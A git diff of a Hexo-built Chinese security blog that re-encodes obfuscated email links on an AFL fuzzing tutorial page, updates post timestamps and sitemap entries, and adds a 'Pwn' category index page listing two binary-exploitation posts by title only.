diff --git a/2019/07/01/AFL-first-learn/index.html b/2019/07/01/AFL-first-learn/index.html
index c84d3056..11320573 100644
--- a/2019/07/01/AFL-first-learn/index.html
+++ b/2019/07/01/AFL-first-learn/index.html
@@ -479,7 +479,7 @@
 
 <hr>
 <h1 id="0x02-AFL快速入门"><a href="#0x02-AFL快速入门" class="headerlink" title="0x02 AFL快速入门"></a>0x02 <a href="http://lcamtuf.coredump.cx/afl/QuickStartGuide.txt" target="_blank" rel="noopener">AFL快速入门</a></h1><p>1）用<code>make</code>编译AFL。如果构建失败，请参阅docs / INSTALL以获取提示。<br>2）查找或编写一个相当快速和简单的程序，该程序从<strong><em>文件或标准输入</em></strong>中获取数据，以一种有价值的方式处理它，然后干净地退出。如果测试网络服务，请将其修改为在前台运行并从stdin读取。在对使用校验和的格式进行模糊测试时，也要注释掉校验和验证码。<br>遇到故障时，程序必须正常崩溃。注意自定义SIGSEGV或SIGABRT处理程序和后台进程。有关检测非崩溃缺陷的提示，请参阅<code>docs/README</code>中的第11节。<br>3）使用afl-gcc编译要模糊的程序/库。一种常见的方法是：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ CC = /path/to/afl-gcc CXX =/path/to/afl-g++ ./configure --disable-shared</span><br><span class="line">$ make clean all</span><br></pre></td></tr></table></figure></p>
-<p>如果程序构建失败，请联系 <a href="mailto:&#97;&#x66;&#108;&#x2d;&#117;&#x73;&#x65;&#x72;&#115;&#x40;&#103;&#111;&#x6f;&#103;&#x6c;&#x65;&#x67;&#x72;&#x6f;&#x75;&#112;&#115;&#46;&#x63;&#111;&#109;" target="_blank" rel="noopener">&#97;&#x66;&#108;&#x2d;&#117;&#x73;&#x65;&#x72;&#115;&#x40;&#103;&#111;&#x6f;&#103;&#x6c;&#x65;&#x67;&#x72;&#x6f;&#x75;&#112;&#115;&#46;&#x63;&#111;&#109;</a>。<br>4）获取一个对程序有意义的小而有效的输入文件。在模糊详细语法（SQL，HTTP等）时，也要创建字典，如<code>dictionaries/README.dictionaries</code>中所述。<br>5）如果程序从stdin读取，则运行<code>afl-fuzz</code>，如下所示：<br><code>./afl-fuzz -i testcase_dir -o findings_dir  -- /path/to/tested/program [... program&#39;s cmdline ...]</code><br>   如果程序从文件中获取输入，则可以在程序的命令行中输入@@; AFL会为您放置一个自动生成的文件名。</p>
+<p>如果程序构建失败，请联系 <a href="mailto:&#x61;&#x66;&#108;&#45;&#117;&#115;&#x65;&#114;&#x73;&#64;&#103;&#111;&#111;&#103;&#108;&#x65;&#x67;&#x72;&#111;&#117;&#112;&#x73;&#x2e;&#99;&#x6f;&#x6d;" target="_blank" rel="noopener">&#x61;&#x66;&#108;&#45;&#117;&#115;&#x65;&#114;&#x73;&#64;&#103;&#111;&#111;&#103;&#108;&#x65;&#x67;&#x72;&#111;&#117;&#112;&#x73;&#x2e;&#99;&#x6f;&#x6d;</a>。<br>4）获取一个对程序有意义的小而有效的输入文件。在模糊详细语法（SQL，HTTP等）时，也要创建字典，如<code>dictionaries/README.dictionaries</code>中所述。<br>5）如果程序从stdin读取，则运行<code>afl-fuzz</code>，如下所示：<br><code>./afl-fuzz -i testcase_dir -o findings_dir  -- /path/to/tested/program [... program&#39;s cmdline ...]</code><br>   如果程序从文件中获取输入，则可以在程序的命令行中输入@@; AFL会为您放置一个自动生成的文件名。</p>
 <p><strong>一些参考文档</strong></p>
 <blockquote>
 <p><a href="http://lcamtuf.coredump.cx/afl/README.txt" target="_blank" rel="noopener">docs/README</a>  -  AFL的一般介绍，<br><a href="https://github.com/mirrorer/afl/blob/master/docs/perf_tips.txt" target="_blank" rel="noopener">docs/perf_tips.txt</a>  - 关于如何快速模糊的简单提示，<br><a href="http://lcamtuf.coredump.cx/afl/status_screen.txt" target="_blank" rel="noopener">docs/status_screen.txt</a>  -  UI中显示的花絮的解释，<br><a href="https://github.com/mirrorer/afl/blob/master/docs/parallel_fuzzing.txt" target="_blank" rel="noopener">docs/parallel_fuzzing.txt</a>  - 关于在多个核上运行AFL的建议<br><a href="http://lcamtuf.coredump.cx/afl/demo/" target="_blank" rel="noopener">Generated test cases for common image formats</a> - 生成图像文件测试用例的demo<br><a href="http://lcamtuf.coredump.cx/afl/technical_details.txt" target="_blank" rel="noopener">Technical “whitepaper” for afl-fuzz</a> - 技术白皮书</p>
@@ -496,10 +496,10 @@
 </ol>
 <hr>
 <h1 id="0x04-AFL-README"><a href="#0x04-AFL-README" class="headerlink" title="0x04 AFL README"></a>0x04 <a href="http://lcamtuf.coredump.cx/afl/README.txt" target="_blank" rel="noopener">AFL README</a></h1><blockquote>
-<p>Written and maintained by Michal Zalewski <a href="mailto:&#108;&#99;&#97;&#109;&#116;&#117;&#x66;&#64;&#x67;&#x6f;&#x6f;&#x67;&#108;&#x65;&#x2e;&#x63;&#111;&#109;" target="_blank" rel="noopener">&#108;&#99;&#97;&#109;&#116;&#117;&#x66;&#64;&#x67;&#x6f;&#x6f;&#x67;&#108;&#x65;&#x2e;&#x63;&#111;&#109;</a></p>
+<p>Written and maintained by Michal Zalewski <a href="mailto:&#108;&#x63;&#x61;&#109;&#116;&#117;&#x66;&#64;&#x67;&#x6f;&#111;&#103;&#108;&#101;&#46;&#99;&#x6f;&#x6d;" target="_blank" rel="noopener">&#108;&#x63;&#x61;&#109;&#116;&#117;&#x66;&#64;&#x67;&#x6f;&#111;&#103;&#108;&#101;&#46;&#99;&#x6f;&#x6d;</a></p>
 <p>  Copyright 2013, 2014, 2015, 2016 Google Inc. All rights reserved.<br>  Released under terms and conditions of Apache License, Version 2.0.</p>
 <p>  For new versions and additional information, check out:<br>  <a href="http://lcamtuf.coredump.cx/afl/" target="_blank" rel="noopener">http://lcamtuf.coredump.cx/afl/</a></p>
-<p>  To compare notes with other users or get notified about major new features,<br>  send a mail to <a href="mailto:&#97;&#x66;&#108;&#45;&#x75;&#115;&#101;&#114;&#115;&#x2b;&#x73;&#117;&#98;&#115;&#99;&#x72;&#105;&#98;&#101;&#64;&#103;&#111;&#111;&#x67;&#108;&#101;&#103;&#x72;&#111;&#117;&#112;&#x73;&#x2e;&#99;&#x6f;&#109;" target="_blank" rel="noopener">&#97;&#x66;&#108;&#45;&#x75;&#115;&#101;&#114;&#115;&#x2b;&#x73;&#117;&#98;&#115;&#99;&#x72;&#105;&#98;&#101;&#64;&#103;&#111;&#111;&#x67;&#108;&#101;&#103;&#x72;&#111;&#117;&#112;&#x73;&#x2e;&#99;&#x6f;&#109;</a>.</p>
+<p>  To compare notes with other users or get notified about major new features,<br>  send a mail to <a href="mailto:&#97;&#x66;&#x6c;&#x2d;&#x75;&#115;&#x65;&#x72;&#x73;&#43;&#x73;&#117;&#98;&#115;&#x63;&#114;&#x69;&#98;&#101;&#64;&#103;&#111;&#x6f;&#x67;&#x6c;&#x65;&#103;&#x72;&#x6f;&#x75;&#x70;&#115;&#46;&#x63;&#x6f;&#109;" target="_blank" rel="noopener">&#97;&#x66;&#x6c;&#x2d;&#x75;&#115;&#x65;&#x72;&#x73;&#43;&#x73;&#117;&#98;&#115;&#x63;&#114;&#x69;&#98;&#101;&#64;&#103;&#111;&#x6f;&#x67;&#x6c;&#x65;&#103;&#x72;&#x6f;&#x75;&#x70;&#115;&#46;&#x63;&#x6f;&#109;</a>.</p>
 <p>  <strong>See QuickStartGuide.txt if you don’t have time to read this file.</strong></p>
 </blockquote>
 <h2 id="1）具有导向性的模糊测试的挑战"><a href="#1）具有导向性的模糊测试的挑战" class="headerlink" title="1）具有导向性的模糊测试的挑战"></a>1）具有导向性的模糊测试的挑战</h2><p>Fuzzing是用于识别真实软件中的安全问题的最强大且经过验证的策略之一;它负责安全关键软件中迄今为止发现的绝大多数远程代码执行和权限提升漏洞。<br>不幸的是，模糊测试也不够有力。盲目的、随机的变异使得它不太可能在测试代码中达到某些代码路径，从而使一些漏洞超出了这种技术的范围。<br>已经有许多尝试来解决这个问题。早期方法之一 - 由Tavis Ormandy开创 - 是一种 <strong>语义库蒸馏（corpus distillation）</strong> 。网上找到的一些大型语料库中往往包含大量的文件，这时就需要对其精简，该方法依赖于覆盖信号从大量高质量的候选文件语料库中选择有趣种子的子集，然后通过传统方式对其进行模糊处理。该方法非常有效，但需要这样的语料库随时可用。正因为如此，<strong>代码覆盖率</strong> 也只是衡量程序执行状态的一个简单化的度量，这种方式并不适合后续引导fuzzing测试的。<br>其他更复杂的研究集中在诸如 <strong>程序流分析（“concoic execution”），符号执行或静态分析</strong> 等技术上。所有这些方法在实验环境中都非常有前景，但在实际应用中往往会遇到可靠性和性能问题 - 部分高价值的程序都有非常复杂的内部状态和执行路径，在这一方面符号执行和concolic技术往往会显得不够健壮（如路径爆炸问题），所以仍然稍逊于传统的fuzzing技术。</p>
diff --git a/2019/07/10/x86basic/index.html b/2019/07/10/x86basic/index.html
index 0745236d..caa85100 100644
--- a/2019/07/10/x86basic/index.html
+++ b/2019/07/10/x86basic/index.html
@@ -104,7 +104,7 @@
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png">
-<meta property="og:updated_time" content="2019-07-26T01:00:43.904Z">
+<meta property="og:updated_time" content="2019-10-25T13:07:23.257Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="x86-basic 漏洞利用">
 <meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。  0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函">
@@ -385,8 +385,8 @@
               
               
                 <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
-                  <a href="/categories/Pwn二进制漏洞/" itemprop="url" rel="index">
-                    <span itemprop="name">Pwn二进制漏洞</span>
+                  <a href="/categories/Pwn/" itemprop="url" rel="index">
+                    <span itemprop="name">Pwn</span>
                   </a>
                 </span>
 
diff --git a/2019/07/16/linux-pwn-32/index.html b/2019/07/16/linux-pwn-32/index.html
index ed1a93f0..2aff8eb8 100644
--- a/2019/07/16/linux-pwn-32/index.html
+++ b/2019/07/16/linux-pwn-32/index.html
@@ -88,7 +88,7 @@
 <meta property="og:description" content="之前介绍了Windows x86平台下栈溢出漏洞的开放与利用，鉴于CTF基本都是Linux，还有实际开发环境，很多智能设备的系统都是基于Linux，所以从很现实的需求出发，一定要学习学习Linux下漏洞的分析。 ref：  CTF-WIKI：https://ctf-wiki.github.io/ctf-wiki/pwn/readme-zh/蒸米大佬的一步一步学rop http://www.anqu">
 <meta property="og:locale" content="zh-Hans">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1563267241/pwn/4a7227aa9f00bd2fd45d363da4cf25c6fd425638.jpg">
-<meta property="og:updated_time" content="2019-07-16T09:16:44.729Z">
+<meta property="og:updated_time" content="2019-10-25T13:06:26.899Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="Linux Pwn-缓冲区溢出利用">
 <meta name="twitter:description" content="之前介绍了Windows x86平台下栈溢出漏洞的开放与利用，鉴于CTF基本都是Linux，还有实际开发环境，很多智能设备的系统都是基于Linux，所以从很现实的需求出发，一定要学习学习Linux下漏洞的分析。 ref：  CTF-WIKI：https://ctf-wiki.github.io/ctf-wiki/pwn/readme-zh/蒸米大佬的一步一步学rop http://www.anqu">
@@ -369,8 +369,8 @@
               
               
                 <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
-                  <a href="/categories/Pwn二进制漏洞/" itemprop="url" rel="index">
-                    <span itemprop="name">Pwn二进制漏洞</span>
+                  <a href="/categories/Pwn/" itemprop="url" rel="index">
+                    <span itemprop="name">Pwn</span>
                   </a>
                 </span>
 
diff --git a/baidusitemap.xml b/baidusitemap.xml
index cfa71ef4..d8136be5 100644
--- a/baidusitemap.xml
+++ b/baidusitemap.xml
@@ -1,11 +1,14 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   <url>
+    <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
+    <lastmod>2019-10-25</lastmod>
+  </url>  <url>
+    <loc>https://cool-y.github.io/2019/07/16/linux-pwn-32/</loc>
+    <lastmod>2019-10-25</lastmod>
+  </url>  <url>
     <loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
     <lastmod>2019-07-27</lastmod>
-  </url>  <url>
-    <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
-    <lastmod>2019-07-26</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/07/25/Debug-a-router-firmware/</loc>
     <lastmod>2019-07-25</lastmod>
@@ -18,9 +21,6 @@
   </url>  <url>
     <loc>https://cool-y.github.io/2019/07/24/web-dvwa/</loc>
     <lastmod>2019-07-24</lastmod>
-  </url>  <url>
-    <loc>https://cool-y.github.io/2019/07/16/linux-pwn-32/</loc>
-    <lastmod>2019-07-16</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/04/21/XIAOMI-UPnP/</loc>
     <lastmod>2019-07-11</lastmod>
diff --git a/categories/Pwn/index.html b/categories/Pwn/index.html
new file mode 100644
index 00000000..09a18428
--- /dev/null
+++ b/categories/Pwn/index.html
@@ -0,0 +1,1170 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="Hexo, NexT">
+
+
+
+
+
+
+
+
+
+
+<meta name="description" content="没人比我更懂中医#MAGA">
+<meta property="og:type" content="website">
+<meta property="og:title" content="混元霹雳手">
+<meta property="og:url" content="https://cool-y.github.io/categories/Pwn/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:description" content="没人比我更懂中医#MAGA">
+<meta property="og:locale" content="zh-Hans">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="混元霹雳手">
+<meta name="twitter:description" content="没人比我更懂中医#MAGA">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/categories/Pwn/">
+
+
+
+
+
+  <title>分类: Pwn | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left ">
+    <div class="headband"></div>
+
+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-bookmarks">
+          <a href="/bookmarks/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-map"></i> <br>
+            
+            书签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-hack之外">
+          <a href="/hack之外/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
+            
+            HACK之外
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  
+  
+  
+  <div class="post-block category">
+
+    <div id="posts" class="posts-collapse">
+      <div class="collection-title">
+        <h1>Pwn<small>分类</small>
+        </h1>
+      </div>
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2019/07/16/linux-pwn-32/" itemprop="url">
+              
+                <span itemprop="name">Linux Pwn-缓冲区溢出利用</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2019-07-16T17:11:42+08:00" content="2019-07-16">
+          07-16
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2019/07/10/x86basic/" itemprop="url">
+              
+                <span itemprop="name">x86-basic 漏洞利用</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2019-07-10T17:00:36+08:00" content="2019-07-10">
+          07-10
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+    </div>
+
+  </div>
+  
+  
+  
+
+  
+
+
+
+          </div>
+          
+
+
+          
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+
+      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description">没人比我更懂中医#MAGA</p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">21</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">7</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">41</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          <div id="music163player">
+                <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="450" src="//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=430"></iframe>
+          </div>
+
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">65.9k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://jjeejj.github.io/css/gitment.css">
+        <script src="https://jjeejj.github.io/js/gitment.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+
+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
